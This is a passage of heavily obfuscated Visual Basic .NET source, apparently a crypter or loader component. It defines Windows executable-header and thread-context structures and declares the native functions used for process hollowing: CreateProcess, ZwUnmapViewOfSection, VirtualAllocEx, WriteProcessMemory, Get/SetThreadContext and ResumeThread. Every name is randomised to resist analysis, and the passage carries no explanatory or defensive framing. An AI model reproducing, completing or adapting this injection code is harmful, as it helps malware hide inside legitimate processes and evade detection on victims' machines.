Dim DeYvqMwGQLLvPLJMtkDgJ, WopKqVlLAFsStXcvwIkgV, SOqgPYwpnQPbLMhPXLWDn, lYKrOhluWJAvqZDCahGDC, HhaFOqaCGChSXmXldFnDO, DIcbjsmgtOEbmbcFDIZXg, mgejMEKNNpwrWNQEXdAUq, WRtnjEbldHluUnvoGeJXr, SpvMIHmRTSIHjcDIehrqN, IYKkoLSukqLBaYsRwRBpW, lCOXHQbXDMqaQpXrhFcrY, HLfjHZQckFauvEqekbMrk, DjgHdcbIaQuGNqvuLeuNF, WsATckROJJeasGRhOCfOR, STCpBncrwVCjKsWBmFQhj, lcSDBwRwgOjGoHqkpbAhv As UInt32
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=512)> Dim HmjPAIGEQHTaWUMWswiiJ As Byte()
End Structure
<StructLayout(0)> Structure IGWZUKlZaAomwWEsVhRNo
Dim DNklWLRiGTnjlJRnSCTEb, WWEwWUHnnMXGSVlZVYEEn, SuGVrWSUdXsPhKpqtbmYI, lGWgrfHZNRciPXMdwwWYU, HQnsrotetKMFtkfPCVHYg, DnpRPrHLjVgOMZkgaYprB, WAIcPDtQTORiqlHSduZsM As UInteger
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=80)> Dim RYKBlFIuJalrIaMjDwLOf As Byte()
Dim lhaMkOuCqTVOnnfVHVsOq As UInt32
End Structure
Structure XfYoUocGdsXCwKAcSUvVe
Dim JlmlZuTPkduGFsuFLHmnJ, mlmswTnPXuiCVtGmlXsBl As UInt32
End Structure
Structure FecVSCMRkhlbvjrsMsHmJ
Dim HqrYkXjHaMFiUCCIKrcPF As Byte, XfYoUocGdsXCwKAcSUvVe As XfYoUocGdsXCwKAcSUvVe, JlmlZuTPkduGFsuFLHmnJ, mlmswTnPXuiCVtGmlXsBl, EVIdUfnBtBmfSuepPwNVS, CRtuJaulQYarjoGYhuOiX, WbMIIjjqARKOREaLkSvij, RBOeemuWnceXgqfcLVhFE, kLfqevkcWVOrNFBOOrRFQ, nGaGTVUkgmFOwvuLPHbdT As UInt32
End Structure
Structure UOuFnNMCJmqHskSvnTaIn
Dim TXNYMsVHdwOXpBuSUHQUe, YwMCopKbnkrOaMpBtEeAM As IntPtr, HUvEdGZhGPvNsSVARPBFb, CsAaCJkNtaTWKHaRpSkZt As Integer
End Structure
<StructLayout(0, CharSet:=3)> Structure JhecmfoNaYKuHMITtNsJN
Dim TtJsTMffAtVrRibZMjrdI As Integer, VEQlCSZTdTDqpTtDsoUZI, RcSKXVkwTfXCHIBUSrGsa, kmjWXeaEDYHWlVUHVPntm As String, GvChXnPJkRpqTioqYlXtB, IuGHvccUGnSWCIZYptcBA, CWEGspanZdMCiXtKwoJPT, VfURsBPsJWtWPjPtCMqQe, RGWnREaZwhQfeYUNaPcjA, kPnCQNPegaACMlowdlMjL, GZGNQWFjQUiWqAKjgJtkX, nGaGTVUkgmFOwvuLPHbdT As Integer
Dim CAIjmYQQGfFfJmPCHMfGp, VJZvlhFVnYmBnCimKiPGE As Short, RhaTKkQCdkJKFonGhlAZW, kqrfKtFHMdrekDKpkJiai, GDKqJFsMtWbBRQdbnfSat, CaMPfIGqjhvKgFisOiDtO As Integer
End Structure
<StructLayout(0)> Structure YRwNLrowAdPaEOgXXmNdr
Dim VkdbfRsvTbfeORFeRGlua As Integer, RLfADTGbJmDndGJvpJWQs As IntPtr, kUvLDcshqfkKKTdisfGQH As Integer
End Structure
<StructLayout(0)> Structure YsDqEaeYdfIGbeDPeKjTQ
Dim EnsnogUWGrKrswVOqguAA, GdPWDlhmaZUepgwUvDoRT, CEQsYotSQkonHVElVGZkl, mwqbjwqZvYOimAiXLYfuG, mlmswTnPXuiCVtGmlXsBl, IIJniIfefSvETNEJOtPuR, EgLLHKqLVdTNiCJamwBRj, lcSDBwRwgOjGoHqkpbAhv, XpcXHTgQFWDhQOcMpViRv, qCsiGcVVmPkEubwwsrSRK, mZuHcfgCcbHNMQEPTtEkc, IjOTcoVHMUohrcXCWSllo, EKPpBrgkCfMqJRcTtVWHJ, XTgDACWqiZtNnewFwrHHU As UInt16
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=4)> Dim VEQlCSZTdTDqpTtDsoUZI As UInt16()
Dim qcwOALLvSSdhVqSoCPoIg, mDBkWOWbIdAqkfXIaSZbB As UInt16
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=10)> Dim VJZvlhFVnYmBnCimKiPGE As UInt16()
Dim JlmlZuTPkduGFsuFLHmnJ As Int32
End Structure
Structure ncWaZleKDkMjYfbSIjFnu
Dim JPqSSdJpQgnidKRuSdLef As UInt32, ErDAbwAYQwtCrfLAIaoet As INSwVXLgpWhNSsqrdoKbN, ERwUhPKvktDXTPpHAEToX As EkTVraWNfiFWhhvLErsvf
End Structure
<StructLayout(0)> Structure INSwVXLgpWhNSsqrdoKbN
Dim XukgqjLSPbmpOtSvHPcvr, XEULaHmdApdWYrejLwZfI As UInt16, qGDsqsBXwUWMtJlhKlNvF, EKPpBrgkCfMqJRcTtVWHJ, meFQPuMEmgqVLvqBhovSY As UInt32, mlmswTnPXuiCVtGmlXsBl, nGaGTVUkgmFOwvuLPHbdT As UInt16
End Structure
<StructLayout(0)> Structure EkTVraWNfiFWhhvLErsvf
Public EnsnogUWGrKrswVOqguAA As UInt16, InWcOGBJVZbppKNkkMgSj, EOYBkJMnLkvBHARELPRlE As Byte, XXoMkSBssefVmMlnOlBmQ, qhIYjbnAcXPpTZHaRJjmc, mIJuIdCeSikBjOMqpMUIu, JlmlZuTPkduGFsuFLHmnJ, IRaIImojCbUVQagdsiEJJ, JcWTDQLKQTYmIeTieTAcR, XaQfhYAETnkrBbLqDaDoi As UInt32, EpcedpCQpnoefPluTlncb, XBspdBoVZgYBNcHgWJXcm As UInt32
Public qLMEdKdaIZIUrobSZfHdB, miOaBNpHvlddJdfjwiqwT, IselBVeMfeNAoqCVCGawf, DTgKXYppVphJGfHmaJMSA, XcwWWhevFiRdkraZdftTM, qlQhWqTDmcCASHuLgDdTX As UInt16, lMSGstegcnWJhtCcHGPmq, TBSEGbLhJBIDQRQKbdlKD, mKiPFkAmqrpWudjueCWLP, qCsiGcVVmPkEubwwsrSRK As UInt32, IWiRrFUlMgGdPIVOKcwnE, nGaGTVUkgmFOwvuLPHbdT As UInt16
Public DtknQHfSCsamevafhfiJW, WGDCQQUXilLJLKtRlDSJi, pPUNPZJcSescqXQEoZCKu, lnWjlcUJIqPmIMVUOcldP, HwmullKOpjwImYoHRAVdb, DXoTJnVsfuTRENtYpDGAt As UInt32
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=16)> Public WhIfJwKAPnEljaQKsZoAH As WhIfJwKAPnEljaQKsZoAH()
End Structure
<StructLayout(0)> Structure WhIfJwKAPnEljaQKsZoAH
Dim JlmlZuTPkduGFsuFLHmnJ, mlmswTnPXuiCVtGmlXsBl As UInt32
End Structure
Declare Auto Function CreateProcess Lib "kernel32" (ByVal name As String, ByVal command As String, ByRef process As YRwNLrowAdPaEOgXXmNdr, ByRef thread As YRwNLrowAdPaEOgXXmNdr, ByVal inherit As Boolean, ByVal flags As UInt32, ByVal system As IntPtr, ByVal current As String, <[In]()> ByRef startup As JhecmfoNaYKuHMITtNsJN, <Out()> ByRef info As UOuFnNMCJmqHskSvnTaIn) As Boolean
Declare Auto Function WriteProcessMemory Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByVal buffer As Byte(), ByVal size As IntPtr, <Out()> ByRef written As Integer) As Boolean
Declare Auto Function ReadProcessMemory Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByRef buffer As IntPtr, ByVal size As IntPtr, ByRef read As Integer) As Integer
Declare Auto Function VirtualProtectEx Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByVal size As UIntPtr, ByVal [new] As UIntPtr, <Out()> ByVal old As UInt32) As Integer
Declare Auto Function VirtualAllocEx Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByVal size As UInt32, ByVal type As UInt32, ByVal protect As UInt32) As IntPtr
Declare Auto Function ZwUnmapViewOfSection Lib "ntdll" (ByVal process As IntPtr, ByVal address As IntPtr) As Long
Declare Auto Function ResumeThread Lib "kernel32" (ByVal thread As IntPtr) As UInt32
Declare Auto Function GetThreadContext Lib "kernel32" (ByVal thread As IntPtr, ByRef context As ntJltnMfNdhvChSoiTmSc) As Boolean
Declare Auto Function SetThreadContext Lib "kernel32" (ByVal thread As IntPtr, ByRef context As ntJltnMfNdhvChSoiTmSc) As Boolean
End Class
End Class